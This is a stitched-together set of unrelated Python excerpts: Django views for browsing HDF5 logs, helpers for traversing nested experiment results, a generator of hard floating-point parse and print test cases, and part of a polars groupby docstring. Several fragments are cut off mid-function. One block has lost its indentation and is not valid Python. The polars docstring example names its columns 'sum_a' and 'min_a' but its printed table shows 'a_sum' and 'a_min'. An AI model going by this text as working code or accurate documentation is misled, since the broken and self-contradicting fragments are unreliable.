  # to construct the log structure.
  first_log = request.session['log_paths'][0]
  log_data = struct_tree.StructTree(first_log, fail_silently=True,
                                    readonly=True)
  try:
    skeleton = log_data.Skeleton(path, depth=1)
  except h5_io.H5IndexError:
    return http.HttpResponse('{}')
  d3_tree = struct_tree.DictToD3Tree(skeleton, '.', path)
  if 'children' not in d3_tree:
    return http.HttpResponse('{}')
  # The first layer is a placeholder. Starts from the second layer.
  return http.HttpResponse(json.dumps(d3_tree['children']))
def ViewLogStructure(request, paths, template_name='log_structure.html'):
  """View structure of an HDF5 log at given log path.

  Args:
    request: An HttpRequest from the client.
    paths: Paths to the local log files, separated by ';'. A basename
      wrapped in parentheses is treated as a regular expression matching
      files within its directory.
    template_name: The HTML template used to render the layout.

  Returns:
    An HttpResponse that renders the log structure.
  """
  # `context` includes variables used to render the HTML.
  context = {
      'graph_width': 6000,
      'graph_height': 6000,
      'frame_width': 200,
      'frame_height': 540,
      'canvas_cols': 12,
  }
  log_paths = []
  for path in paths.split(';'):
    path = path.strip()
    if not path:
      continue
    # Expand environment variables (e.g. $MAKANI_HOME) in the path.
    path_template = string.Template(path)
    log_path = path_template.substitute(os.environ)
    basename = os.path.basename(log_path)
    if basename.startswith('(') and basename.endswith(')'):
      # "(regex)" basename: select every matching file in the directory.
      dirname = os.path.dirname(log_path)
      regex_pattern = re.compile(basename[1:-1]+'$')
      filenames = os.listdir(dirname)
      matched_files = [f for f in filenames if regex_pattern.match(f)]
      log_paths += [os.path.join(dirname, f) for f in matched_files]
    else:
      log_paths.append(log_path)
  if not log_paths:
    context['errors'] = 'Cannot find log data'
  else:
    # Use the first log to index fields.
    log_data = struct_tree.StructTree(
        log_paths[0], fail_silently=True, readonly=True)
    log_skeleton = log_data.Skeleton(depth=1)
    d3_data = struct_tree.DictToD3Tree(log_skeleton, '/')
    # URL the client calls to lazily expand tree nodes (see BrowseLog).
    d3_data['expand_url'] = urlresolvers.reverse('browse_log', args=[''])
    request.session['log_paths'] = log_paths
    context['skeleton'] = json.dumps(d3_data)
  order_horizontally = True
  configs = _LoadConfigs()
  scenarios = layout_base.AssembleLayout([
      ('Signals', [
          widgets.DictLinesWidget('series', None, interactive=True,
                                  use_markers=True),
      ]),
  ], desired_view_cols=1, order_horizontally=order_horizontally)
  layout_names = loader.LayoutLoader().ModuleNames()
  layout_names.sort()
  configs['scenarios'] = scenarios
  context.update(_PrepareContext(configs))
  context['layout_names'] = layout_names
  context['content_width'] = settings.CSS_GRID_COLUMNS - 2
  context['order_horizontally'] = order_horizontally
  _CreateAndAddClientIdToContext(context)
  return shortcuts.render(request, template_name, context,
                          context_instance=template.RequestContext(request))
def PeriodicDataPoll(request, client_id, layout_name):
  """Compute realtime data and respond to periodic polling from a client layout.

  Args:
    request: An HttpRequest from the client.
    client_id: The ID of the client's browser tab.
    layout_name: Name of the layout associated with the client.

  Returns:
    An HttpResponse in the format of a serialized JSON object.
  """
  aggregated_message = _GetMessage(request, client_id)
  if not aggregated_message:
    # Fall back to an empty tree so layout.Filter can still run.
    aggregated_message = struct_tree.StructTree(
        {}, fail_silently=True, readonly=True)
  layout = loader.LayoutLoader().GetLayoutByModuleName(layout_name)
  tab_memory = layout_memory.GetMemory(client_id, False)
  if tab_memory is not None:
    # Load the persistent memory.
    layout.Import(tab_memory)
  else:
    # First poll for this tab: initialize and create the memory slot.
    layout.Initialize()
    tab_memory = layout_memory.GetMemory(client_id, True)
  # Start the AIO receiver in case the server has restarted.
  _TryToEnforceAioReceiver(client_id)
  try:
    data = layout.Filter(aggregated_message)
  except Exception:  # pylint: disable=broad-except
    # layout.Filter may introduce any kind of exception.
    logging.error('PeriodicDataPoll encountered an error:\n%s',
                  debug_util.FormatTraceback())
    # Export even on failure so the next poll resumes from saved state.
    layout.Export(tab_memory)
    return http.HttpResponse('{}')
  # Save the persistent memory.
  layout.Export(tab_memory)
  resp = data.Json()
  if settings.DEBUG:
    # Attach per-indicator error reports for the debug console.
    resp['__message__'] = '\n-----------------------------\n'.join(
        'Error in indicator "%s":\n%s' % (k, v)
        for k, v in layout.ErrorReport())
  resp_str = json.dumps(resp)
  layout.ClearErrors()
  return http.HttpResponse(resp_str)
def _DownSample(data, length):
window_size = max(1, len(data)/length)
if window_size > 1:
data = data[:len(data) / window_size * window_size]
return numpy.mean(data.reshape(-1, window_size), 1), window_size
else:
return data, 1
def GetLogData(request, mode, fields):
"""Get values of data fields within a log file."""
log_paths = request.session['log_paths']
fields = [f.strip() for f in fields.split('\n') if f.strip()]
field_labels = layout_util.GetDistinguishableNames(
fields, '.', ['kAioNode', 'kMessageType'])
if mode | |
this call (one
particular combination of agent, environment and agent parameter name, and environment and
agent parameter value at a time).
:return: Dictionary with organised data.
"""
agent = kwargs.get('agent')
env_key = kwargs.get('env_param')
env_val = kwargs.get('env_val')
agent_key = kwargs.get('agent_param')
agent_value = kwargs.get('agent_val')
for v in exp_run:
val_results_list[agent][env_key][env_val][agent_key][v].append((agent_value, exp_run[v]))
return val_results_list
def traverse_experiments(exp_runs,
                         function_on_data: Callable,
                         func_param: Any,
                         data_keys: Union[str, List[str]],
                         agent_keys: Optional[Union[str, List[str]]] = None,
                         env_keys: Optional[Union[str, List[str]]] = None,
                         mode: str = 'disaggregate'):
    """
    Process data stored in exp_runs. Data is traversed taking into account agent, and possibly
    environment and agent parameters and their values.
    :param exp_runs: Nested dictionary with all data logs separated by agent, data variable and
        maybe by environment and agent parameters and their values.
    :param function_on_data: Function to process the data.
    :param func_param: Extra parameters to be passed to the function that will process the data.
        NOTE: this dict is mutated in place (agent/env/param keys are written into it on every
        iteration), so callers should not rely on its contents afterwards.
    :param data_keys: String or list of strings with the keys of the data variables to be
        processed.
    :param agent_keys: Optional string or list of strings with the agent parameter keys according
        to which data should be separated when being processed.
    :param env_keys: Optional string or list of strings with the environment parameter keys
        according to which data should be separated when being processed.
    :param mode: Specify how the results should be returned:
        - aggregate: Return one single result per data variable for all experiments (i.e. agents,
          and possibly environment and agent parameters and their values).
        - disaggregate: Return dictionary with processed data separated by agent and per variable,
          and possibly per agent and environment parameters and their values.
    :return result: Result from the function after traversed the data.
    :raises ValueError: If mode is neither 'disaggregate' nor 'aggregate' (only detected after
        the full traversal has already run).
    """
    # Container mirroring the exp_runs nesting; only filled in 'disaggregate' mode.
    new_exp_runs = create_results_container(agent_keys, env_keys, dict)
    for agent in exp_runs.keys():  # Traverse agents.
        func_param['agent'] = agent
        for k in data_keys:  # Traverse data variables.
            func_param['variable'] = k
            if env_keys:  # Per environment parameter disaggregation.
                for e in env_keys:  # Traverse env parameters.
                    func_param['env_param'] = e
                    for e_val in exp_runs[agent][e].keys():  # Traverse values per env parameter.
                        func_param['env_val'] = e_val
                        if agent_keys:  # Per agent parameter disaggregation.
                            for p in agent_keys:  # Traverse agent parameters.
                                func_param['agent_param'] = p
                                # Traverse values per agent parameter.
                                for p_val in exp_runs[agent][e][e_val][p].keys():
                                    func_param['agent_val'] = p_val
                                    result = function_on_data(
                                        exp_runs[agent][e][e_val][p][p_val][k], **func_param)
                                    if mode == 'disaggregate':  # Store disaggregated.
                                        new_exp_runs[agent][e][e_val][p][p_val][k] = result
                        else:  # No agent parameters.
                            result = function_on_data(exp_runs[agent][e][e_val][k], **func_param)
                            if mode == 'disaggregate':  # Store disaggregated.
                                # NOTE(review): stores under [agent][k] only, discarding
                                # e/e_val, so later env values overwrite earlier results —
                                # confirm this is intended.
                                new_exp_runs[agent][k] = result
            else:
                if agent_keys:
                    for p in agent_keys:  # Traverse parameters.
                        for p_val in exp_runs[agent][p].keys():
                            func_param['agent_param'] = p
                            func_param['agent_val'] = p_val
                            result = function_on_data(exp_runs[agent][p][p_val][k], **func_param)
                            if mode == 'disaggregate':  # Store disaggregated.
                                new_exp_runs[agent][p][p_val][k] = result
                else:
                    result = function_on_data(exp_runs[agent][k], **func_param)
                    if mode == 'disaggregate':  # Store disaggregated.
                        new_exp_runs[agent][k] = result
    # NOTE(review): in 'aggregate' mode `result` is only bound if at least one agent
    # and one data key were traversed; empty inputs raise UnboundLocalError here.
    if mode == 'disaggregate':  # Return disaggregated results.
        return new_exp_runs
    elif mode == 'aggregate':  # Return aggregated results.
        return result
    else:
        raise ValueError(f"Invalid mode: {mode} not in [disaggregate, aggregate]")
def find_min_duration(exp_runs: Dict[str, Dict[str, List[np.ndarray]]],
                      data_keys: Union[str, List[str]],
                      agent_keys: Optional[Union[str, List[str]]] = None,
                      env_keys: Optional[Union[str, List[str]]] = None) -> int:
    """
    Return the minimum run length found anywhere in exp_runs.

    Every variable in data_keys is visited for every agent and, when given,
    for every agent/environment parameter value; the shortest run wins.
    :param exp_runs: Nested dictionary with all data logs separated by agent, data variable and
        maybe by environment and agent parameters and their values.
    :param data_keys: Key(s) of the data variables to inspect.
    :param agent_keys: Optional agent parameter key(s) used to separate the data.
    :param env_keys: Optional environment parameter key(s) used to separate the data.
    :return: Scalar minimum length across all experiments.
    """
    # Seed the running minimum with the largest possible int so the first
    # real duration always replaces it.
    seed = {'min_dur': sys.maxsize}
    return traverse_experiments(exp_runs, min_duration_call, seed,
                                data_keys, agent_keys, env_keys,
                                mode='aggregate')
def stack_exp_runs(exp_runs: Dict[str, Dict[str, List[np.ndarray]]],
                   data_keys: Union[str, List[str]],
                   agent_keys: Optional[Union[str, List[str]]] = None,
                   env_keys: Optional[Union[str, List[str]]] = None):
    """
    Stack each group of runs into one 2-D numpy array: one row per run, one
    column per time step, truncated to the shortest run across all experiments.
    :param exp_runs: Nested dictionary with all data logs separated by agent, data variable and
        maybe by environment and agent parameters and their values.
    :param data_keys: Key(s) of the data variables to process.
    :param agent_keys: Optional agent parameter key(s) used to separate the data.
    :param env_keys: Optional environment parameter key(s) used to separate the data.
    :return: Tuple (new_exp_runs, min_dur):
        - new_exp_runs: Nested dictionary mirroring exp_runs, with each group of
          runs replaced by a single stacked Numpy array.
        - min_dur: Minimum length across all experiments.
    """
    data_keys, agent_keys, env_keys = validate_input_params(data_keys, agent_keys, env_keys)
    # All rows must share a width, so truncate to the globally shortest run.
    min_dur = find_min_duration(exp_runs, data_keys, agent_keys, env_keys)
    stacked = traverse_experiments(exp_runs, stack_call, {'min_dur': min_dur},
                                   data_keys, agent_keys, env_keys,
                                   mode='disaggregate')
    return stacked, min_dur
def aggregate_statistics(exp_runs: Dict[str, Dict[str, List[np.ndarray]]],
                         data_keys: Union[str, List[str]],
                         agent_keys: Optional[Union[str, List[str]]] = None,
                         env_keys: Optional[Union[str, List[str]]] = None):
    """
    Compute per-time-step statistics (mean, standard deviation, standard error)
    of the selected data variables across each set of experiments.
    :param exp_runs: Nested dictionary with all data logs separated by agent, data variable and
        maybe by environment and agent parameters and their values.
    :param data_keys: Key(s) of the data variables to process.
    :param agent_keys: Optional agent parameter key(s) used to separate the data.
    :param env_keys: Optional environment parameter key(s) used to separate the data.
    :return: Nested dictionary with the same layout as exp_runs, where each
        stacked run array is replaced by its across-run statistics.
    """
    data_keys, agent_keys, env_keys = validate_input_params(data_keys, agent_keys, env_keys)
    # statistics_call needs no extra parameters, hence the empty dict.
    return traverse_experiments(exp_runs, statistics_call, {},
                                data_keys, agent_keys, env_keys,
                                mode='disaggregate')
def get_cum_sum_statistics(exp_runs: Dict[str, Dict[str, List[np.ndarray]]],
                           discount_factor: float,
                           data_keys: Union[str, List[str]],
                           agent_keys: Optional[Union[str, List[str]]] = None,
                           env_keys: Optional[Union[str, List[str]]] = None):
    """
    Replace each experiment row with its discounted cumulative sum (typically
    applied to the instantaneous cost).
    :param exp_runs: Nested dictionary with all data logs separated by agent, data variable and
        maybe by environment and agent parameters and their values.
    :param discount_factor: Discount factor applied along the time axis.
    :param data_keys: Key(s) of the data variables to process.
    :param agent_keys: Optional agent parameter key(s) used to separate the data.
    :param env_keys: Optional environment parameter key(s) used to separate the data.
    :return: Nested dictionary with the same layout as exp_runs, each row replaced
        by its discounted cumulative sum.
    """
    data_keys, agent_keys, env_keys = validate_input_params(data_keys, agent_keys, env_keys)
    return traverse_experiments(exp_runs, discounted_cum_sum_call,
                                {"discount_factor": discount_factor},
                                data_keys, agent_keys, env_keys,
                                mode='disaggregate')
def get_total_sum_statistics(exp_runs: Dict[str, Dict[str, List[np.ndarray]]],
data_keys: Union[str, List[str]],
agent_keys: Optional[Union[str, List[str]]] = None,
env_keys: Optional[Union[str, List[str]]] = None):
"""
Computes the sum of some data variables (typically the instantaneous cost) for each experiment
(row) in `exp_runs`.
:param exp_runs: Nested dictionary with all data logs separated by agent, data variable and
maybe by environment and agent parameters and their values.
:param data_keys: String or list of strings with the keys of the data variables to be
processed.
:param | |
<reponame>remyoudompheng/fptest<filename>fptest.py
"""
Generate hard test cases for floating point conversion.
Requires Python 3.
"""
def main():
    """
    Run the generator for the mode given on the command line, or for every
    mode when none is given.

    Sample expected output:
        for e2=827, e10=249, digs=14236688121214300 / mant=15907522898771511
        ε' = 2**827/10**249 - digs/mant = 5.765155354479547e-32
    """
    # Each mode selects one combination of width (32/64 bits),
    # direction (parse/print) and exponent sign (+/-).
    MODES = [
        "parse64+", "parse64-",
        "parse32+", "parse32-",
        "print64+", "print64-",
        "print32+", "print32-",
    ]
    import argparse
    p = argparse.ArgumentParser()
    # MODE is optional (nargs='?'): with no argument, all modes run below.
    p.add_argument("MODE", choices=MODES, nargs='?')
    args = p.parse_args()
    arg = args.MODE
    # Throughout: (e2 * 78913) >> 18 == floor(e2 * 78913 / 2**18), and
    # 78913 / 2**18 ≈ 0.301029..., i.e. ≈ log10(2) — it converts a binary
    # exponent e2 to the matching decimal exponent e10.
    if not arg or arg == "parse64+":
        # 680k values
        for e2 in range(50, 1024-52):
            e10 = (e2 * 78913) >> 18
            find_hard_parse(e2, e10+1, mantbits=54, prec=96)
    if not arg or arg == "parse64-":
        # 600k values
        for e2 in range(20, 1024+52):
            e10 = (e2 * 78913) >> 18
            if e2 == 1075:
                # denormals have exponent p-1074 so midpoint have p-1075
                find_hard_parse_negexp(e2, e10, mantbits=53, prec=96, denormal=True)
            else:
                find_hard_parse_negexp(e2, e10, mantbits=54, prec=96)
    if not arg or arg == "print64+":
        # 275k values
        for e2 in range(30, 1024-52):
            e10 = (e2 * 78913) >> 18
            find_hard_print(e2, e10+1, mantbits=53, prec=96)
    if not arg or arg == "print64-":
        # 500k values
        for e2 in range(53, 1024+52):
            e10 = (e2 * 78913) >> 18
            if e2 == 1075:
                # denormals
                e2 = 1074
                find_hard_print_negexp(e2, e10, mantbits=52, prec=96, denormal=True)
            else:
                find_hard_print_negexp(e2, e10, mantbits=53, prec=96)
    # For float32, check values where 52 bit precision is not enough.
    if not arg or arg == "parse32+":
        # 138 values
        for e2 in range(24, 128-23):
            e10 = (e2 * 78913) >> 18
            find_hard_parse(e2, e10+1, mantbits=25, prec=52)
    if not arg or arg == "parse32-":
        # 145 values
        for e2 in range(16, 128+23):
            e10 = (e2 * 78913) >> 18
            if e2 == 150:
                # denormals have exponent p-149 (so midpoint is XXp-150)
                find_hard_parse_negexp(e2, e10+1, mantbits=24, prec=52, denormal=True)
            else:
                find_hard_parse_negexp(e2, e10+1, mantbits=25, prec=52)
    if not arg or arg == "print32+":
        for e2 in range(24, 128-23):
            e10 = (e2 * 78913) >> 18
            find_hard_print(e2, e10+1, mantbits=24, prec=48)
    if not arg or arg == "print32-":
        # 500k values
        for e2 in range(24, 128+23):
            e10 = (e2 * 78913) >> 18
            if e2 == 150:
                # denormals
                e2 = 149
                # NOTE(review): this branch passes e10-1 while parse32- passes
                # e10+1 for its denormal case — confirm the offset is intended.
                find_hard_print_negexp(e2, e10-1, mantbits=23, prec=48, denormal=True)
            else:
                find_hard_print_negexp(e2, e10, mantbits=24, prec=48)
def find_hard_parse(e2, e10, mantbits=54, prec=96):
    """
    Find floating point numbers which are hard to parse from decimal
    representation. The same numbers will be hard to format
    to their "shortest representation" because doing so requires
    knowing whether a representation parses back to the original number.
    e.g. find floating-point numbers with exponent 385 hard to parse.
    For example: 8640368759831959p+385
    The midpoint (8640368759831959 + 1/2) * 1<<385
    is 68089572682806429.999999999999999e115
    so it is hard to determine whether 68089572682806430e115
    should parse to 8640368759831959p385 or 8640368759831960p385.
    We are looking for:
        mantissa × 2**385 × 10**-116 = digits + ε
        where digits < 1e16
              mantissa < 2**54
              mantissa is odd (mantissa of the midpoint)
    that is:
        2**385 / 10**116 = digits / mantissa + ε'
    The typical threshold we are interested in is
        ε = 10**16 / 2**63 (rounding error in 64-bit arithmetic)
        or ε' = 10**16 / 2**(63+53)
    which gives about (1e16)*(2**54)*ε' = 2e13 candidates.
    If we focus on rounding error at 96-bit precision,
    (± 1e16 / 2**(96+53)) which yields about 5000 candidates.
    """
    # Bracket the target ratio 2**e2 / 10**e10 inside a relative interval of
    # width ~2**(1-prec); the two branches avoid negative powers of two.
    if e2 < prec:
        r1 = Rat(2**prec - 1, 10**e10 * 2**(prec-e2), bound=2**mantbits)
        r2 = Rat(2**prec + 1, 10**e10 * 2**(prec-e2), bound=2**mantbits)
    else:
        r1 = Rat(2**e2 - 2**(e2-prec), 10**e10, bound=2**mantbits)
        r2 = Rat(2**e2 + 2**(e2-prec), 10**e10, bound=2**mantbits)
    #print("bounds 2**{}/10**{}: {}/{} -> {}/{}".format(
    #    e2, e10, n1, d1, n2, d2))
    # Enumerate fractions digs/mant between the brackets whose denominators
    # stay below 2**mantbits (Farey walk, see walk()).
    for x, y in walk(r1, r2, bound=2**mantbits):
        digs, mant = x, y
        # try odd multiples
        # Per the docstring above, only odd mantissas correspond to midpoints.
        if mant % 2 == 1:
            m = mant
            d = digs
            # Step through odd multiples m = mant, 3*mant, ... until the
            # mantissa no longer fits in mantbits bits.
            while m.bit_length() <= mantbits:
                if m.bit_length() == mantbits:
                    decimal = str(m << e2)
                    if e10 > 20:
                        # Keep only the 20 most significant decimal digits.
                        decimal = decimal[:20-e10] + "..."
                    print('{:17} {:17}e+{:03} {:17}p+{} = {:>45}'.format(
                        m, d, e10, m, e2, decimal))
                m += 2*mant
                d += 2*digs
        else:
            #print('{:17} {:17}'.format(mant, digs))
            pass
    # epsilon
    #epsilon = (2**e2 * mant - 10**e10 * digs) / (10**e10 * mant)
    #print("epsilon =", epsilon)
def find_hard_parse_negexp(e2, e10, mantbits=54, prec=96, denormal=False):
    """
    Like find_hard_parse but for negative exponents.
    We look for:
        mantissa / 2**e2 = digits / 10**e10 + ε
        10**e10 / 2**e2 = digits / mantissa + ε'
    When `denormal` is true, mantissas shorter than `mantbits` bits are
    also reported (denormals have no implicit leading bit).
    """
    # Bracket 10**e10 / 2**e2 inside a relative interval of width ~2**(1-prec).
    if e10 < prec:
        # multiply by 2**(prec-e10)
        r1 = Rat(10**e10 * 2**(prec-e10) - 5**e10, 2**(e2+prec-e10), bound=2**mantbits)
        r2 = Rat(10**e10 * 2**(prec-e10) + 5**e10, 2**(e2+prec-e10), bound=2**mantbits)
    else:
        r1 = Rat(10**e10 - (10**e10 >> prec), 2**e2, bound=2**mantbits)
        r2 = Rat(10**e10 + (10**e10 >> prec), 2**e2, bound=2**mantbits)
    for x, y in walk(r1, r2, bound=2**mantbits):
        digs, mant = x, y
        # try odd multiples
        if mant % 2 == 1:
            m = mant
            d = digs
            while m.bit_length() <= mantbits:
                if denormal or m.bit_length() == mantbits:
                    # m / 2**e2 has the same digits as m * 5**e2 (shifted).
                    decimal = str(m * 5**e2)
                    if e2 > 30:
                        # Drop roughly 0.7*(e2-30) trailing digits to keep the
                        # printed value short.
                        trim = ((e2-30)*7) // 10
                        decimal = decimal[:-trim]
                    print('{:17} {:17}e-{:03d} {:17}p-{} = {:>45}...'.format(
                        m, d, e10, m, e2, decimal))
                m += 2*mant
                d += 2*digs
def find_hard_print(e2, e10, mantbits=53, prec=96):
    """
    Like find_hard_parse but now we are looking for:
        mantissa × 2**e2 × 10**-e10 = digits + 1/2 + ε
    where ε is very small.
    The fractions we are looking for are:
        (2*digits+1) / (2*mantissa)
    """
    # One extra bit so that (2*digits+1)/(2*mantissa) fits under the bound.
    BOUND = 2**(1+mantbits)
    if e2 < prec:
        r1 = Rat(2**prec - 1, 10**e10 * 2**(prec-e2), bound=BOUND)
        r2 = Rat(2**prec + 1, 10**e10 * 2**(prec-e2), bound=BOUND)
    else:
        r1 = Rat(2**e2 - 2**(e2-prec), 10**e10, bound=BOUND)
        r2 = Rat(2**e2 + 2**(e2-prec), 10**e10, bound=BOUND)
    #print("bounds 2**{}/10**{}: {}/{} -> {}/{}".format(
    #    e2, e10, n1, d1, n2, d2))
    for x, y in walk(r1, r2, bound=BOUND):
        digs, mant = x, y
        # try odd multiples
        # Even denominator with odd numerator matches the (2d+1)/(2m) shape
        # described in the docstring: true mantissa mant/2, digits digs//2.
        if mant & 1 == 0 and digs & 1 == 1:
            m = mant
            d = digs
            while m.bit_length() <= mantbits+1:
                if m.bit_length() == mantbits+1:
                    # m is 2*mantissa, so shift by e2-1 instead of e2.
                    decimal = str(m << (e2-1))
                    if e10 > 20:
                        # Keep only the 20 most significant decimal digits.
                        decimal = decimal[:20-e10] + "..."
                    print('{:17} {:17}e+{:03} {:17}p+{} = {:>45}'.format(
                        m // 2, d // 2, e10, m // 2, e2, decimal))
                m += 2*mant
                d += 2*digs
    # epsilon
    #epsilon = (2**e2 * mant - 10**e10 * digs) / (10**e10 * mant)
    #print("epsilon =", epsilon)
def find_hard_print_negexp(e2, e10, mantbits=53, prec=96, denormal=False):
    """
    Like find_hard_print but for negative exponents: the target ratio is
    10**e10 / 2**e2 (bracketed as in find_hard_parse_negexp) and the
    candidate fractions have the (2*digits+1) / (2*mantissa) shape.
    When `denormal` is true, shorter mantissas are also reported.
    """
    # One extra bit so that (2*digits+1)/(2*mantissa) fits under the bound.
    BOUND = 2**(1+mantbits)
    if e10 < prec:
        # multiply by 2**(prec-e10)
        r1 = Rat(10**e10 * 2**(prec-e10) - 5**e10, 2**(e2+prec-e10), bound=BOUND)
        r2 = Rat(10**e10 * 2**(prec-e10) + 5**e10, 2**(e2+prec-e10), bound=BOUND)
    else:
        r1 = Rat(10**e10 - (10**e10 >> prec), 2**e2, bound=BOUND)
        r2 = Rat(10**e10 + (10**e10 >> prec), 2**e2, bound=BOUND)
    for x, y in walk(r1, r2, bound=BOUND):
        digs, mant = x, y
        # try odd multiples
        if mant & 1 == 0 and digs & 1 == 1:
            m = mant
            d = digs
            while m.bit_length() <= mantbits+1:
                if denormal or m.bit_length() == mantbits+1:
                    # (m//2) / 2**e2 has the same digits as (m//2) * 5**e2.
                    decimal = str((m//2) * 5**e2)
                    # NOTE(review): threshold is e2 > 36 here, but the trim is
                    # still based on (e2-30) as in find_hard_parse_negexp —
                    # confirm the mismatch is intentional.
                    if e2 > 36:
                        trim = ((e2-30)*7) // 10
                        decimal = decimal[:-trim] + "..."
                    print('{:17} {:17}e-{:03} {:17}p-{} = {:>45}'.format(
                        m // 2, d // 2, e10, m // 2, e2, decimal))
                m += 2*mant
                d += 2*digs
def walk(r1, r2, bound):
    """
    Enumerate the fractions between r1 and r2 (inclusive) whose denominators
    do not exceed `bound` — i.e. the corresponding slice of the Farey
    sequence of order `bound`.
    >>> list(walk(Rat(1, 4), Rat(1, 2), bound=8))
    [(1, 4), (2, 7), (1, 3), (3, 8), (2, 5), (3, 7), (1, 2)]
    >>> list(walk(Rat(1, 4), Rat(1, 3), bound=12))
    [(1, 4), (3, 11), (2, 7), (3, 10), (1, 3)]
    >>> list(walk(Rat(1, 4), Rat(2, 7), bound=32))
    [(1, 4), (8, 31), (7, 27), (6, 23), (5, 19), (4, 15), (7, 26), (3, 11), (8, 29), (5, 18), (7, 25), (9, 32), (2, 7)]
    >>> len(list(walk(Rat(65352703432539, 79006570561214),
    ...               Rat(34807131698651, 42079240217226), bound=2**48)))
    39930
    """
    # FIXME: a couple of duplicates seem to appear
    node = r1.clone()
    end = r2.fraction()
    current = node.fraction()
    yield current
    # Keep stepping to the next Farey neighbour until r2 is reached.
    while current != end:
        node = node.next(bound)
        current = node.fraction()
        yield current
class Rat:
def __init__(self, num, den, bound=None):
"""
Computes a continued fraction | |
of {Int32, Int64}. Note that
Int32 gets temporarily cast to Int64, so if performance matters use an Int64 column.
period
length of the window
offset
offset of the window. Default is -period
closed
Defines if the window interval is closed or not.
Any of {"left", "right", "both" "none"}
by
Also group by this column/these columns
Examples
--------
>>> dates = [
... "2020-01-01 13:45:48",
... "2020-01-01 16:42:13",
... "2020-01-01 16:45:09",
... "2020-01-02 18:12:48",
... "2020-01-03 19:45:32",
... "2020-01-08 23:16:43",
... ]
>>> df = pl.DataFrame({"dt": dates, "a": [3, 7, 5, 9, 2, 1]}).with_column(
... pl.col("dt").str.strptime(pl.Datetime)
... )
>>> out = df.groupby_rolling(index_column="dt", period="2d").agg(
... [
... pl.sum("a").alias("sum_a"),
... pl.min("a").alias("min_a"),
... pl.max("a").alias("max_a"),
... ]
... )
>>> assert out["sum_a"].to_list() == [3, 10, 15, 24, 11, 1]
>>> assert out["max_a"].to_list() == [3, 7, 7, 9, 9, 1]
>>> assert out["min_a"].to_list() == [3, 3, 3, 3, 2, 1]
>>> out
shape: (6, 4)
┌─────────────────────┬───────┬───────┬───────┐
│ dt ┆ a_sum ┆ a_max ┆ a_min │
│ --- ┆ --- ┆ --- ┆ --- │
│ datetime[ms] ┆ i64 ┆ i64 ┆ i64 │
╞═════════════════════╪═══════╪═══════╪═══════╡
│ 2020-01-01 13:45:48 ┆ 3 ┆ 3 ┆ 3 │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┤
│ 2020-01-01 16:42:13 ┆ 10 ┆ 7 ┆ 3 │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┤
│ 2020-01-01 16:45:09 ┆ 15 ┆ 7 ┆ 3 │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┤
│ 2020-01-02 18:12:48 ┆ 24 ┆ 9 ┆ 3 │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┤
│ 2020-01-03 19:45:32 ┆ 11 ┆ 9 ┆ 2 │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌┤
│ 2020-01-08 23:16:43 ┆ 1 ┆ 1 ┆ 1 │
└─────────────────────┴───────┴───────┴───────┘
"""
return RollingGroupBy(self, index_column, period, offset, closed, by)
def groupby_dynamic(
self,
index_column: str,
every: str,
period: Optional[str] = None,
offset: Optional[str] = None,
truncate: bool = True,
include_boundaries: bool = False,
closed: str = "right",
by: Optional[Union[str, List[str], "pli.Expr", List["pli.Expr"]]] = None,
) -> "DynamicGroupBy":
"""
Groups based on a time value (or index value of type Int32, Int64). Time windows are calculated and rows are assigned to windows.
Different from a normal groupby is that a row can be member of multiple groups. The time/index window could
be seen as a rolling window, with a window size determined by dates/times/values instead of slots in the DataFrame.
A window is defined by:
- every: interval of the window
- period: length of the window
- offset: offset of the window
The `every`, `period` and `offset` arguments are created with
the following string language:
- 1ns (1 nanosecond)
- 1us (1 microsecond)
- 1ms (1 millisecond)
- 1s (1 second)
- 1m (1 minute)
- 1h (1 hour)
- 1d (1 day)
- 1w (1 week)
- 1mo (1 calendar month)
- 1y (1 calendar year)
- 1i (1 index count)
Or combine them:
"3d12h4m25s" # 3 days, 12 hours, 4 minutes, and 25 seconds
In case of a groupby_dynamic on an integer column, the windows are defined by:
- "1i" # length 1
- "10i" # length 10
Parameters
----------
index_column
Column used to group based on the time window.
Often to type Date/Datetime
This column must be sorted in ascending order. If not the output will not make sense.
In case of a dynamic groupby on indices, dtype needs to be one of {Int32, Int64}. Note that
Int32 gets temporarily cast to Int64, so if performance matters use an Int64 column.
every
interval of the window
period
length of the window, if None it is equal to 'every'
offset
offset of the window if None and period is None it will be equal to negative `every`
truncate
truncate the time value to the window lower bound
include_boundaries
add the lower and upper bound of the window to the "_lower_bound" and "_upper_bound" columns.
this will impact performance because it's harder to parallelize
closed
Defines if the window interval is closed or not.
Any of {"left", "right", "both" "none"}
by
Also group by this column/these columns
Examples
--------
>>> from datetime import datetime
>>> # create an example dataframe
>>> df = pl.DataFrame(
... {
... "time": pl.date_range(
... low=datetime(2021, 12, 16),
... high=datetime(2021, 12, 16, 3),
... interval="30m",
... ),
... "n": range(7),
... }
... )
>>> df
shape: (7, 2)
┌─────────────────────┬─────┐
│ time ┆ n │
│ --- ┆ --- │
│ datetime[ns] ┆ i64 │
╞═════════════════════╪═════╡
│ 2021-12-16 00:00:00 ┆ 0 │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌┤
│ 2021-12-16 00:30:00 ┆ 1 │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌┤
│ 2021-12-16 01:00:00 ┆ 2 │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌┤
│ 2021-12-16 01:30:00 ┆ 3 │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌┤
│ 2021-12-16 02:00:00 ┆ 4 │
